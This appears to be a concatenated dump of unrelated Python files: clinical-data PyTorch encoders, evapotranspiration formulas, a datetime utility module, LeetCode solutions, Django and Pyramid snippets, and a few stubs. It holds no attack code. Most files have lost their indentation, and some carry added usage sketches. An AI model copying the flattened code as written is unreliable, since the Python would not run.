import torch
from torch import nn
import clinicaldg.eicu.Constants as Constants
class FlattenedDense(nn.Module):
def __init__(self, ts_cat_levels, static_cat_levels, emb_dim, num_layers, num_hidden_units,
t_max = 48, dropout_p = 0.2):
super().__init__()
self.ts_cat_levels = ts_cat_levels
self.static_cat_levels = static_cat_levels
self.emb_dim = emb_dim
self.ts_embedders = nn.ModuleList([nn.Embedding(num_embeddings = ts_cat_levels[i], embedding_dim = emb_dim) for i in ts_cat_levels])
self.static_embedders = nn.ModuleList([nn.Embedding(num_embeddings = static_cat_levels[i], embedding_dim = emb_dim) for i in static_cat_levels])
input_size = (len(Constants.ts_cont_features) * t_max + len(Constants.ts_cat_features) * emb_dim * t_max
+ len(Constants.static_cont_features) + len(Constants.static_cat_features) * emb_dim
)
layers = [nn.Linear(input_size, num_hidden_units)]
for i in range(1, num_layers):
layers.append(nn.ReLU())
layers.append(nn.Dropout(p = dropout_p))
layers.append(nn.BatchNorm1d(num_hidden_units))
layers.append(nn.Linear(num_hidden_units, num_hidden_units))
self.clf = nn.Sequential(*layers)
self.n_outputs = num_hidden_units
def forward(self, x):
ts_cont_feats, ts_cat_feats, static_cont_feats, static_cat_feats = (x['ts_cont_feats'].float(),
x['ts_cat_feats'], x['static_cont_feats'].float(), x['static_cat_feats'])
# shape of ts inputs: (batch_size, 48, n_features)
# shape of static inputs: (batch_size, n_features)
ts_cont_feats = ts_cont_feats.flatten(start_dim = 1) # now (batch_size, n_features*48)
cat_embs = []
for i in range(len(self.ts_embedders)):
cat_embs.append(self.ts_embedders[i](ts_cat_feats[:, :, i]).flatten(start_dim = 1))
for i in range(len(self.static_embedders)):
cat_embs.append(self.static_embedders[i](static_cat_feats[:, i]))
x_in = torch.cat(cat_embs, dim = 1)
x_in = torch.cat([x_in, ts_cont_feats, static_cont_feats], dim = 1)
return self.clf(x_in)
class GRUNet(nn.Module):
def __init__(self, ts_cat_levels, static_cat_levels, emb_dim, num_layers, num_hidden_units,
t_max = 48, dropout_p = 0.2):
super().__init__()
self.ts_cat_levels = ts_cat_levels
self.static_cat_levels = static_cat_levels
self.emb_dim = emb_dim
self.t_max = t_max
self.ts_embedders = nn.ModuleList([nn.Embedding(num_embeddings = ts_cat_levels[i], embedding_dim = emb_dim) for i in ts_cat_levels])
self.static_embedders = nn.ModuleList([nn.Embedding(num_embeddings = static_cat_levels[i], embedding_dim = emb_dim) for i in static_cat_levels])
input_size = (len(Constants.ts_cont_features) + len(Constants.ts_cat_features) * emb_dim
+ len(Constants.static_cont_features) + len(Constants.static_cat_features) * emb_dim
)
self.gru = nn.GRU(input_size = input_size, hidden_size = num_hidden_units, num_layers = num_layers,
batch_first = True, dropout = dropout_p, bidirectional = True)
self.n_outputs = num_hidden_units * 2 # bidirectional
def forward(self, x):
ts_cont_feats, ts_cat_feats, static_cont_feats, static_cat_feats = (x['ts_cont_feats'].float(),
x['ts_cat_feats'], x['static_cont_feats'].float(), x['static_cat_feats'])
# shape of ts inputs: (batch_size, 48, n_features)
# shape of static inputs: (batch_size, n_features)
x_in = torch.cat([ts_cont_feats] + [embedder(ts_cat_feats[:, :, c]) for c, embedder in enumerate(self.ts_embedders)], dim = -1)
cat_embs = []
for i in range(len(self.static_embedders)):
cat_embs.append(self.static_embedders[i](static_cat_feats[:, i]))
statics = torch.cat([static_cont_feats] + cat_embs, dim = -1)
statics = statics.unsqueeze(1).expand(statics.shape[0], self.t_max, statics.shape[-1])
x_in = torch.cat([x_in, statics], dim = -1)
return self.gru(x_in)[0][:, -1, :]
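# ---------------------------------------------------------------------------
# Usage sketch (not part of the original source). A minimal, hedged example of
# how these encoders might be instantiated and called; the level counts (10)
# and batch size (8) below are hypothetical, and the feature lists come from
# clinicaldg.eicu.Constants as in the code above.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    ts_cat_levels = {f: 10 for f in Constants.ts_cat_features}          # hypothetical cardinalities
    static_cat_levels = {f: 10 for f in Constants.static_cat_features}  # hypothetical cardinalities
    model = GRUNet(ts_cat_levels, static_cat_levels, emb_dim=4,
                   num_layers=2, num_hidden_units=16)
    batch = {
        'ts_cont_feats': torch.randn(8, 48, len(Constants.ts_cont_features)),
        'ts_cat_feats': torch.randint(0, 10, (8, 48, len(Constants.ts_cat_features))),
        'static_cont_feats': torch.randn(8, len(Constants.static_cont_features)),
        'static_cat_feats': torch.randint(0, 10, (8, len(Constants.static_cat_features))),
    }
    features = model(batch)  # expected shape: (8, model.n_outputs)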
|
python
|
'''
Copyright University of Minnesota 2020
Authors: Mohana Krishna, Bryan C. Runck
'''
import math
# Formulas specified here can be found in the following document:
# https://www.mesonet.org/images/site/ASCE_Evapotranspiration_Formula.pdf
# Page number of each formula is supplied with each function.
def get_delta(temp):
"""
Reference page number: 28-29
Parameters
------------------------------
temp: (``float``)
        The air temperature in degrees Celsius
Returns
------------------------------
delta: (``float``)
The slope of the saturation vapor pressure-temperature curve in kPa/C
"""
numerator = 2503 * math.exp((17.27 * temp) / (temp + 237.3))
denominator = math.pow(temp + 237.3, 2)
delta = numerator / denominator
return delta
def get_flux_density(r_n_metric, r_n, os):
"""
Reference page number: 44
    Currently, nighttime is defined as solar radiation values less than or equal to 5 W/m^2
Parameters
------------------------------
r_n_metric: (``float``)
Solar radiation in W/m^2
r_n: (``float``)
        Solar radiation in MJ m^-2 h^-1
os: (``bool``)
Boolean which indicates whether to calculate G for short reference or tall reference
Returns
------------------------------
G: (``float``)
        Soil heat flux density in MJ m^-2 h^-1
"""
G = None
daytime = r_n_metric > 5
if os:
if daytime:
G = 0.1 * r_n
else:
G = 0.5 * r_n
else:
if daytime:
G = 0.04 * r_n
else:
G = 0.2 * r_n
return G
def get_gamma(p):
"""
Reference page number: 28
Parameters
------------------------------
p: (``float``)
Barometric pressure in kPa
Returns
------------------------------
gamma: (``float``)
Gamma (psychrometric constant) in kPa/C
"""
gamma = 0.000665 * p
return gamma
def get_cn(r_n_metric, os):
"""
Reference page number: 5
Parameters
------------------------------
r_n_metric: (``float``)
Solar radiation in W/m^2
os: (``bool``)
        Boolean which indicates whether to calculate Cn for the short reference (True) or tall reference (False)
Returns
------------------------------
cn: (``int``)
Numerator constant
"""
cn = None
daytime = r_n_metric > 5
if os:
        if daytime:
cn = 37
return cn
else:
cn = 37
return cn
else:
        if daytime:
cn = 66
return cn
else:
cn = 66
return cn
def get_cd(r_n_metric, os):
"""
Reference page number: 5
Parameters
------------------------------
r_n_metric: (``float``)
Solar radiation in W/m^2
os: (``bool``)
        Boolean which indicates whether to calculate Cd for the short reference (True) or tall reference (False)
Returns
------------------------------
cd: (``float``)
Denominator constant
"""
cd = None
daytime = r_n_metric > 5
if os:
        if daytime:
cd = 0.24
return cd
else:
cd = 0.96
return cd
else:
        if daytime:
cd = 0.25
return cd
else:
cd = 1.7
return cd
def get_es(temp):
"""
Reference page number: 29
Parameters
------------------------------
temp: (``float``)
        Air temperature in degrees Celsius
Returns
------------------------------
es: (``float``)
        The saturation vapour pressure in kPa
"""
es = 0.6108 * math.exp((17.27 * temp) / (temp + 237.3))
return es
def get_ea(temp, rh):
"""
Reference page number: 31-32
Parameters
------------------------------
temp: (``float``)
        Air temperature in degrees Celsius
rh: (``float``)
Relative humidity
Returns
------------------------------
ea: (``float``)
        The actual vapour pressure in kPa
"""
es = get_es(temp)
ea = (rh / 100) * es
return ea
def solar_rad_metric_to_campbell(rad):
"""
Parameters
------------------------------
rad: (``float``)
Solar radiation in W/m2
Returns
------------------------------
campbell_rad: (``float``)
        Solar radiation in MJ m^-2 h^-1
"""
campbell_rad = rad * (3600 / math.pow(10, 6))
return campbell_rad
def solar_rad_campbell_to_metric(rad):
"""
Parameters
------------------------------
rad: (``float``)
        Solar radiation in MJ m^-2 h^-1
Returns
------------------------------
metric_rad: (``float``)
Solar radiation in W/m2
"""
metric_rad = rad * (math.pow(10, 6) / 3600)
return metric_rad
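# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): evaluate the helpers for one
# hypothetical hourly record (25 C air temperature, 60% relative humidity,
# 101.3 kPa pressure, 500 W/m^2 net radiation, short reference surface).
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    temp, rh, pressure, r_n_metric = 25.0, 60.0, 101.3, 500.0
    r_n = solar_rad_metric_to_campbell(r_n_metric)  # -> MJ m^-2 h^-1
    delta = get_delta(temp)
    gamma = get_gamma(pressure)
    es, ea = get_es(temp), get_ea(temp, rh)
    G = get_flux_density(r_n_metric, r_n, True)     # True -> short reference
    cn, cd = get_cn(r_n_metric, True), get_cd(r_n_metric, True)
    print(delta, gamma, es, ea, G, cn, cd)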
|
python
|
from pathlib import Path
from cosmology import Cosmology
from instruments import Instrument
class Simulation:
def __init__(self, data_path, save_path, field, sim_type='src_inj',
cosmo='Planck18'):
self.data_path = Path(data_path)
self.save_path = Path(save_path)
self.field = field
self.sim_type = self._is_valid_sim_type(sim_type)
self.cosmo = Cosmology(cosmo)
self.instruments = self._set_instruments()
def _is_valid_sim_type(self, sim_type):
if sim_type not in ['src_inj', 'analytic']:
raise ValueError(f'Simulation type "{sim_type}" not recognized, ' +
'must be either "src_inj" or "analytic"')
return sim_type
def _set_instruments(self):
if self.field == 'COSMOS':
instr = [Instrument(self.data_path, 'HSC'),
Instrument(self.data_path, 'VIRCam')]
elif self.field in ['GOODS-N', 'GOODS-S']:
instr = [Instrument(self.data_path, 'WFC3')]
else:
raise ValueError(f'Field "{self.field}" not recognized, must be ' +
'"COSMOS", "GOODS-N", or "GOODS-S"')
return instr
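# Usage sketch (not part of the original source). The paths and field below are
# placeholders; Cosmology and Instrument are the package's own classes, so this
# only illustrates the intended call pattern.
if __name__ == '__main__':
    sim = Simulation(data_path='data/', save_path='output/', field='COSMOS',
                     sim_type='src_inj', cosmo='Planck18')
    print(sim.sim_type, [type(i).__name__ for i in sim.instruments])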
|
python
|
# -*- coding: utf-8 -*-
class Solution:
def countPrimes(self, n):
if n == 0 or n == 1:
return 0
result = [1] * n
result[0] = result[1] = 0
for i, el in enumerate(result):
if el:
for j in range(i * i, n, i):
result[j] = 0
return sum(result)
if __name__ == '__main__':
solution = Solution()
assert 0 == solution.countPrimes(0)
assert 0 == solution.countPrimes(1)
assert 0 == solution.countPrimes(2)
assert 1 == solution.countPrimes(3)
assert 2 == solution.countPrimes(4)
assert 2 == solution.countPrimes(5)
assert 3 == solution.countPrimes(6)
assert 3 == solution.countPrimes(7)
assert 4 == solution.countPrimes(8)
assert 4 == solution.countPrimes(9)
assert 4 == solution.countPrimes(10)
assert 4 == solution.countPrimes(11)
assert 5 == solution.countPrimes(12)
|
python
|
import logging
import os
from nose.plugins import Plugin
log = logging.getLogger('nose.plugins.helloworld')
class HelloWorld(Plugin):
name = 'helloworld'
def options(self, parser, env=os.environ):
super(HelloWorld, self).options(parser, env=env)
def configure(self, options, conf):
super(HelloWorld, self).configure(options, conf)
if not self.enabled:
return
def finalize(self, result):
log.info('Hello pluginized world!')
|
python
|
from __future__ import absolute_import
from pyramid.view import view_config
from sqlalchemy import func, and_, or_
from . import timestep_from_request
import tangos
from tangos import core
def add_urls(halos, request, sim, ts):
for h in halos:
h.url = request.route_url('halo_view', simid=sim.escaped_basename, timestepid=ts.escaped_extension,
halonumber=h.basename)
@view_config(route_name='timestep_view', renderer='../templates/timestep_view.jinja2')
def timestep_view(request):
ts = timestep_from_request(request)
sim = ts.simulation
all_objects = []
typecode = 0
while True:
try:
typetag = core.Halo.object_typetag_from_code(typecode)
except ValueError:
break
objects = request.dbsession.query(core.Halo).\
filter_by(timestep_id=ts.id, object_typecode=typecode).order_by(core.Halo.halo_number).all()
add_urls(objects, request, sim, ts)
title = core.Halo.class_from_tag(typetag).__name__+"s"
if title=="BHs":
title="Black holes"
elif title=="PhantomHalos":
title="Phantom halos"
all_objects.append({'title': title, 'typetag': typetag, 'items': objects})
print(typecode, title, len(objects))
typecode+=1
return {'timestep': ts.extension,
'objects': all_objects,
'gather_url': request.route_url('calculate_all',simid=request.matchdict['simid'],
timestepid=request.matchdict['timestepid'],
nameid="")[:-5]}
|
python
|
#!/usr/bin/python3
#
# Copyright © 2017 jared <jared@jared-devstation>
#
# Generates data based on source material
import analyze
markov_data = analyze.data_gen()
|
python
|
#!/usr/bin/env python3
# coding = utf8
import datetime
import pytz
import time
import copy
import sys
def get_utc_datetime():
"""
    Return the current UTC time as a formatted string.
"""
utc_datetime_str = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
return utc_datetime_str
def get_utc_timestamp():
"""
    Return the current UTC time as a POSIX timestamp.
"""
utc_timestamp_str = datetime.datetime.utcnow().timestamp()
return utc_timestamp_str
def get_utc_time_dict():
"""
    Return a dict with the current UTC time string and its timestamp.
"""
utc_time_now = datetime.datetime.utcnow()
utc_datetime_str = utc_time_now.strftime('%Y-%m-%dT%H:%M:%SZ')
utc_timestamp_str = utc_time_now.timestamp()
return {'utc_datetime_str': utc_datetime_str, 'utc_timestamp_str': utc_timestamp_str}
def get_year(
        date_input: str = None,  # input date string
        date_delimiter: str = "-"  # date delimiter
):
    """
    Return the year, either of the current system time or parsed from date_input.
:return: 2018
"""
if date_input is None:
year = datetime.datetime.now().year
else:
a1 = date_input.find(date_delimiter, 0)
year = int(date_input[0:a1])
return year
def get_month(
        date_input: str = None,  # input date string
        date_delimiter: str = "-"  # date delimiter
):
    """
    Return the month, either of the current system time or parsed from date_input.
:return: 8
"""
if date_input is None:
month = datetime.datetime.now().month
else:
date = str(date_input)
a1 = date.find(date_delimiter, 0)
a2 = date.find(date_delimiter, a1 + 1)
month = int(date[a1 + 1:a2])
return month
def get_day(
        date_input: str = None,  # input date string
        date_delimiter: str = "-"  # date delimiter
):
    """
    Return the day of the month, either of the current system time or parsed from date_input.
:return: 1
"""
if date_input is None:
day = datetime.datetime.now().day
else:
date = str(date_input)
a1 = date.find(date_delimiter, 0)
a2 = date.find(date_delimiter, a1 + 1)
day = int(date[a2 + 1:len(date)])
return day
def get_hour():
"""
    Return the current hour of the system time (24-hour clock).
:return: 14
"""
hour = datetime.datetime.now().hour
return hour
def get_minute():
"""
    Return the current minute of the system time.
:return: 28
"""
minute = datetime.datetime.now().minute
return minute
def get_second():
"""
    Return the current second of the system time.
:return: 23
"""
second = datetime.datetime.now().second
return second
def get_time():
"""
    Return the current time of day as a string, to the second (time only).
:return: 14:20:41
"""
inner_now = datetime.datetime.now()
data_time = inner_now.strftime('%H:%M:%S')
return data_time
def get_datetime():
"""
    Return the current system date and time as a string, to the second.
:return: 2018-08-01 14:18:31
"""
inner_now = datetime.datetime.now()
data_time = inner_now.strftime('%Y-%m-%d %H:%M:%S')
return data_time
def get_datetime_full():
"""
    Return the current system datetime object at full precision.
:return: 2018-08-01 14:16:50.611705
"""
inner_now = datetime.datetime.now()
return inner_now
def get_datetime_str_int():
"""
    Return the current system date and time as a compact numeric string, to the second.
:return: 20180801141831
"""
inner_now = datetime.datetime.now()
data_time = inner_now.strftime('%Y%m%d%H%M%S')
return data_time
def get_relative_date(
num: int = 0
):
"""
    Return the date relative to today: num=0 is today, negative num counts back into the past, positive num counts forward into the future.
:param num:
:return: 2018-08-01
"""
today = datetime.date.today()
date = today - datetime.timedelta(days=-num)
return date
def get_relative_datetime(
num: int = 0
):
"""
    Return the datetime relative to now: num=0 is today, negative num counts back into the past, positive num counts forward into the future.
:param num:
:return: 2021-04-23 17:23:27
"""
today = datetime.datetime.now()
date = today - datetime.timedelta(days=-num)
return date.strftime('%Y-%m-%d %H:%M:%S')
def get_timestamp():
"""
    Return the current system time as a timestamp (int).
:return: 1533104393
"""
inner_now = time.time()
return int(inner_now)
def get_timestamp2datetime(
timestamp: int,
f: str = "%Y-%m-%d %H:%M:%S"
):
"""
    Convert a timestamp to a formatted datetime string.
    :param timestamp: supports both string and numeric input
:param f:
:return: 2018-08-01 14:19:53
"""
if timestamp is not None:
time_array = time.localtime(timestamp)
date_time = time.strftime(f, time_array)
return date_time
else:
return
def get_timestamp2date(
timestamp: int,
f: str = "%Y-%m-%d"
):
"""
    Convert a timestamp to a date string.
    The input is converted to int by default.
    :param timestamp:
    :param f:
    :return: 2018-08-01
"""
if timestamp is not None:
time_array = time.localtime(timestamp)
date_time = time.strftime(f, time_array)
return date_time
else:
return
def get_date2timestamp(
date: str,
f: str = "%Y-%m-%d"
):
"""
    Convert a date string to the timestamp of midnight (00:00:00) on that date.
:param date:
:param f:
:return: 1533052800
"""
time_array = time.strptime(date, f)
timestamp = int(time.mktime(time_array))
return timestamp
def get_datetime2timestamp(
data: str,
f: str = "%Y-%m-%d %H:%M:%S"
):
time_array = time.strptime(data, f)
timestamp = int(time.mktime(time_array))
return timestamp
def get_datetime2date(
datetime_str: str
):
datetime_timestamp = get_datetime2timestamp(datetime_str)
date_str = get_timestamp2date(datetime_timestamp)
return date_str
def timestamp_day_num_start(
num: int = 0
):
"""
    Return the timestamp of the start (00:00:00) of the day at the relative offset.
:param num:
:return: 1533052800(2018-08-01 00:00:00)
"""
inner = get_relative_date(num=num)
return get_date2timestamp(str(inner))
def timestamp_day_num_end(
num: int = 0
):
"""
    Return the timestamp of the end (23:59:59) of the day at the relative offset.
:param num:
:return: 1533139199(2018-08-01 23:59:59)
"""
inner = get_relative_date(num=num+1)
return get_date2timestamp(str(inner))-1
def get_format_date(
date_ori: str,
        date_delimiter: str = '-',  # date delimiter
):
    """
    Parse a '-'-delimited date string into a datetime.date.
:param date_ori:
:param date_delimiter:
:return: 2018-01-01
"""
a1 = date_ori.find(date_delimiter, 0)
a2 = date_ori.find(date_delimiter, a1+1)
year = int(date_ori[0:a1])
month = int(date_ori[a1+1:a2])
day = int(date_ori[a2+1:len(date_ori)])
format_date = datetime.date(year, month, day)
return format_date
def get_format_date_2(
date_ori: str
):
"""
    Parse a compact date string such as 20200602 into a datetime.date,
    splitting by character position.
:param date_ori:
:return: 2018-01-01
"""
year = int(date_ori[0:4])
month = int(date_ori[4:6])
day = int(date_ori[6:8])
format_date = datetime.date(year, month, day)
return format_date
def get_format_datetime(
datetime_ori: str,
        date_delimiter: str = '-',  # date delimiter
        space_delimiter: str = "+",  # delimiter between the date part and the time part
        time_delimiter: str = '-'  # time delimiter
):
    """
    Parse a delimited datetime string into a datetime.datetime.
    :param datetime_ori:
    :param date_delimiter: date delimiter
    :param space_delimiter: delimiter between the date part and the time part
    :param time_delimiter: time delimiter
    :return: 2018-01-01 14:18:31
"""
date_str, time_str = datetime_ori.split(space_delimiter)
date_str = str(date_str)
d1 = date_str.find(date_delimiter, 0)
d2 = date_str.find(date_delimiter, d1+1)
year_num = int(date_str[0:d1])
month_num = int(date_str[d1+1:d2])
day_num = int(date_str[d2+1:len(date_str)])
time_str = str(time_str)
t1 = time_str.find(time_delimiter, 0)
t2 = time_str.find(time_delimiter, t1 + 1)
hour_num = int(time_str[0:t1])
minute_num = int(time_str[t1 + 1:t2])
second_num = int(time_str[t2 + 1:len(time_str)])
format_date = datetime.datetime(year_num, month_num, day_num, hour_num, minute_num, second_num)
return format_date
def time_gap_seconds(
start_time: str,
end_time: str
):
"""
    Compute the gap between two datetime strings in seconds (timedelta.seconds, which ignores whole days).
:param start_time:
:param end_time:
:return:
"""
start_time_f = get_format_datetime(start_time)
end_time_f = get_format_datetime(end_time)
return (end_time_f - start_time_f).seconds
def time_gap_days(
start_time: str,
end_time: str
):
"""
    Compute the number of days between two dates.
:param start_time:
:param end_time:
:return:
"""
start_time_f = get_format_date(start_time)
end_time_f = get_format_date(end_time)
return (end_time_f - start_time_f).days
def get_add_date(
date_input: str,
num: int,
f: str = '%Y-%m-%d'
):
"""
    Compute the date `num` days relative to the given date (date_input).
:param date_input:
:param num:
:param f:
:return: 2018-01-02
"""
date = get_format_date(date_input)
delta = datetime.timedelta(days=num)
n_days = date + delta
date_add = n_days.strftime(f)
return date_add
def get_timestamp_interval_seconds(
timestamp: int
):
"""
    Return the number of seconds between the given timestamp and now: positive means the future, negative means the past.
:param timestamp:
:return: 30830
"""
inner_now = time.time()
res = timestamp - int(inner_now)
return res
def count_down(
num: int
):
"""
    Countdown timer: counts down the given number of seconds, refreshing the number in place.
:param num:
:return:
"""
count = 0
while count < num:
n_count = num - count
sys.stdout.write("\r%d " % n_count)
sys.stdout.flush()
time.sleep(1)
count += 1
def running_controller(
start_running_time: str,
end_running_time: str,
start_running_time_f: str = '%H:%M:%S',
end_running_time_f: str = '%H:%M:%S'
):
"""
    Return True if the current system time falls within the configured interval, otherwise False.
:param start_running_time:
:param end_running_time:
:param start_running_time_f:
:param end_running_time_f:
:return:
"""
if (start_running_time is None) and (end_running_time is None):
return True
else:
inner_now = datetime.datetime.strptime(str(get_time()), "%H:%M:%S")
inner_start = datetime.datetime.strptime(start_running_time, start_running_time_f)
inner_end = datetime.datetime.strptime(end_running_time, end_running_time_f)
if (inner_now >= inner_start) and (inner_now < inner_end):
return True
else:
return False
def now():
inner_now = datetime.datetime.now()
return inner_now
def date_string(
        date=None
):
    """
    Convert the given datetime to a date string; if no argument is passed, the
    current system time (evaluated at call time) is used.
    :param date:
    :return:
    """
    if date is None:
        date = now()
    date_string_in = date.strftime('%Y-%m-%d')
    return date_string_in
def time_string(
        date=None
):
    if date is None:
        date = now()
    time_string_in = date.strftime('%Y-%m-%d %H-%M-%S')
    return time_string_in
def datetime_string(
        date=None
):
    if date is None:
        date = now()
    time_string_in = date.strftime('%Y-%m-%d %H-%M-%S')
    return time_string_in
def datetime_string_chs(
        date=None
):
    if date is None:
        date = now()
    time_string_in = date.strftime('%Y年%m月%d日%H时%M分%S秒')
    return time_string_in
def date_str_list(
start_date: str,
end_date: str
):
    # Generate the list of date strings between the start and end dates (inclusive)
start_date_f = get_format_date(start_date)
end_date_f = get_format_date(end_date)
date_list = list()
date_list.append(start_date_f)
added_date = start_date_f
while True:
added_date = get_add_date(added_date, 1)
added_date_f = get_format_date(added_date)
if added_date_f > end_date_f:
break
else:
date_list.append(str(added_date))
return date_list
def date_str_list_form_now(
day_num: int = 1
):
start_date = get_add_date(date_string(), -day_num)
end_date = date_string()
res_list = date_str_list(start_date=start_date, end_date=end_date)
return res_list
def get_normalized_date_string(
days: int = 0
):
"""
    Return the datetime string for `days` days ago.
    :param days: how many days ago
    :return: datetime string (xxxx-xx-xx xx:xx:xx)
"""
current_time = datetime.datetime.now()
target_time = current_time - datetime.timedelta(days=days)
normalized_target_time = target_time.strftime('%Y-%m-%d %H:%M:%S')
return normalized_target_time
def get_data_date_string(
days: int = 0
):
"""
    Return the date string for `days` days ago.
    :param days: how many days ago
    :return: date string (xxxx-xx-xx)
"""
current_time = datetime.datetime.now()
target_time = current_time - datetime.timedelta(days=days)
date_time = target_time.strftime('%Y-%m-%d')
return date_time
def get_date_string(
days: int = 0
):
"""
    Return the date string for `days` days from now.
    :param days: day offset; positive counts into the future, negative into the past, 0 is today
    :return: date string (xxxx-xx-xx)
"""
current_time = datetime.datetime.now()
target_time = current_time + datetime.timedelta(days=days)
date_str = target_time.strftime('%Y-%m-%d')
return date_str
def time_day_num_start(
num: int = 0
):
"""
    Return the datetime of the start (00:00:00) of the day at the relative offset.
:param num:
:return: 2018-08-01 00:00:00
"""
now = datetime.datetime.now()
return now - datetime.timedelta(days=num, hours=now.hour, minutes=now.minute, seconds=now.second,
microseconds=now.microsecond)
def time_day_num_end(
num: int = 0
):
"""
    Return the datetime of the end (23:59:59) of the day at the relative offset.
:param num:
:return: 2018-08-01 23:59:59
"""
now = datetime.datetime.now()
return now - datetime.timedelta(days=num - 1, hours=now.hour, minutes=now.minute, seconds=now.second + 1,
microseconds=now.microsecond)
def timestamp_list_splitter(
timestamp_list: list,
n: int = 2
):
    # timestamp-range splitter
    """
    Input: timestamp_list of [start, end] pairs and a split count n (e.g. 2).
    Each range in the list is split into the configured number of parts; the split is coarse.
:return:
"""
t_list_new = list()
for each_t_list in timestamp_list:
        a = each_t_list[0]  # start timestamp
        b = each_t_list[1]  # end timestamp
        if (b - a) > 1:  # splitting only makes sense when the gap is greater than 1
            m = round((b - a)/n, 0)  # step to add to the start
if m > 0:
pass
elif m == 0:
m = 1
else:
continue
t_list_new_temp = [[a, int(a + m)], [int(a + m + 1), b]]
t_list_new.extend(t_list_new_temp)
else:
t_list_new.extend([each_t_list])
return t_list_new
def date_gap_splitter(
        start_date: str,  # start date
        end_date: str,  # end date
        splitter_gap: int = 1,  # split interval in days
        successive: bool = False  # whether adjacent segments share their boundary date
):
    """
    Date-range splitter: splits the span between the start and end dates into
    segments of the given interval, working from the start forwards.
:return:
"""
day_gap = time_gap_days(start_date, end_date)
if splitter_gap >= day_gap:
return [[start_date, end_date]]
else:
res_list = list()
start_date_temp = start_date
add_count = 0
while True:
end_date_temp = get_add_date(start_date_temp, splitter_gap)
day_gap -= splitter_gap
finish_num = get_date2timestamp(end_date) - get_date2timestamp(end_date_temp)
if finish_num <= 0:
res_list.append([str(start_date_temp), str(end_date)])
break
else:
res_list.append([str(start_date_temp), str(end_date_temp)])
if successive is True:
start_date_temp = copy.deepcopy(end_date_temp)
else:
start_date_temp = get_add_date(end_date_temp, 1)
add_count += 1
return res_list
def get_time_duration(
duration: int
):
    # Convert a duration in seconds into days plus a time-of-day component
    # start_duration = - 8 * 60 * 60  # fixed offset
    temp_datetime = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=duration)
    # temp_datetime = get_timestamp2datetime(duration + start_duration)  # datetime `duration` seconds after 1970-01-01 00:00:00
    temp_date, temp_time = str(temp_datetime).split(' ')  # split into date and time parts
    temp_day = time_gap_days(start_time='1970-01-01', end_time=temp_date)  # number of whole days
if temp_day == 0:
duration_str = temp_time
else:
duration_str = '%sd %s' % (temp_day, temp_time)
res = {
'duration_days': temp_day,
'duration_time': temp_time,
'duration_str': duration_str,
'duration': duration
}
return res
def print_t(
text
):
print("%s >> %s" % ((datetime.datetime.now()), text))
def utc_format(
utc_time=None,
        timezone_local="Asia/Shanghai",
input_format="%Y-%m-%dT%H:%M:%S.%fZ",
output_format="%Y-%m-%d %H:%M:%S"
):
if utc_time is None:
utc_time = datetime.datetime.utcnow()
else:
pass
local_tz = pytz.timezone(timezone_local)
if isinstance(utc_time, datetime.datetime) is True:
utc_datetime = utc_time
else:
utc_datetime = datetime.datetime.strptime(utc_time, input_format)
utc_timestamp = utc_datetime.timestamp()
utc_datetime_str = utc_datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
local_datetime = utc_datetime.replace(tzinfo=pytz.utc).astimezone(local_tz)
local_timestamp = local_datetime.timestamp()
local_datetime_str = local_datetime.strftime(output_format)
res = {
'utc_timestamp': int(utc_timestamp),
'utc_timestamp_m': int(utc_timestamp * 1000),
'utc_datetime_str': utc_datetime_str,
'local_timestamp': int(local_timestamp),
'local_timestamp_m': int(local_timestamp * 1000),
'local_datetime_str': local_datetime_str,
}
return res
def get_file_name(
        date_delimiter: str = '-',  # date delimiter
        space_delimiter: str = "+",  # delimiter between the date part and the time part
        time_delimiter: str = '-'  # time delimiter
):
    """
    Build a filename-friendly timestamp for the current system time, to the second.
    :return: 2018-08-01+14-18-31 (with the default delimiters)
"""
inner_now = datetime.datetime.now()
f_list = ['%Y', date_delimiter, '%m', date_delimiter, '%d', space_delimiter, '%H', time_delimiter, '%M', time_delimiter, '%S']
f_str = ''.join(f_list)
data_time = inner_now.strftime(f_str)
return data_time
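# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): a few illustrative calls.
# The printed values depend on the system clock and local timezone.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    print(get_datetime())                                  # e.g. 2018-08-01 14:18:31
    print(get_add_date('2018-01-01', 7))                   # 2018-01-08
    print(time_gap_days('2018-01-01', '2018-01-31'))       # 30
    print(timestamp_day_num_start(0), timestamp_day_num_end(0))
    print(date_gap_splitter('2018-01-01', '2018-01-10', splitter_gap=3))
    print(utc_format('2021-04-23T09:23:27.000Z'))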
|
python
|
# -*- coding: utf-8 -*-
"""
Configurations
--------------
Specifies the set of configurations for a marksim package
"""
import os
class Configs:
"""
Configurations
"""
    # TODO: it might not be the best design decision to pack all variables under one class.
# tpm configs
MARKOV_ORDER = 1
"""the order of a markov property or how memoryless is our simulation"""
MARKOV_STATES = 100
"""number of states of the markov process"""
# simulation configs
N_SIM = 100
"""number of simulations to perform"""
# analysis configs
    PERCENTILES = 80
    """percentile cutoff used in the analysis, e.g. 80 keeps the top 20%"""
    CONFIDENCE = 99
    """confidence level in percent (99 corresponds to p = 0.01)"""
|
python
|
def test_dbinit(db):
pass
|
python
|
# https://leetcode.com/problems/random-pick-with-weight
import random
import bisect
from typing import List
class Solution:
def __init__(self, ws: List[int]):
s = sum(ws)
v = 0
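        # running prefix sum of the normalised weights: a cumulative distribution over (0, 1]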
self.cumsum = [v := v + w / s for w in ws]
def pickIndex(self) -> int:
return bisect.bisect_left(self.cumsum, random.uniform(0, 1))
# Your Solution object will be instantiated and called as such:
# obj = Solution(w)
# param_1 = obj.pickIndex()
|
python
|
from django.apps import AppConfig
default_app_config = 'mozillians.groups.GroupConfig'
class GroupConfig(AppConfig):
name = 'mozillians.groups'
def ready(self):
import mozillians.groups.signals # noqa
|
python
|
'''
Created on Jan 19, 2016
@author: elefebvre
'''
|
python
|
from django.apps import AppConfig
class GqlConfig(AppConfig):
name = 'gql'
|
python
|
from django.db.models import Q
from django.db.models.manager import Manager
class WorkManager(Manager):
def match(self, data):
"""
Try to match existing Work instance in the best way possible by the data.
If iswc is in data, try to find the match using the following tries:
1. Matching iswc.
2. Matching by source and id from source among the items without iswc.
3. Matching by title and contributor among the items without iswc.
If iswc is not in data:
1. Matching by source and id from source.
2. Matching by title and contributor.
:param data: dict of prepared data for each field.
:return: matched Work instance or None if match is not found.
"""
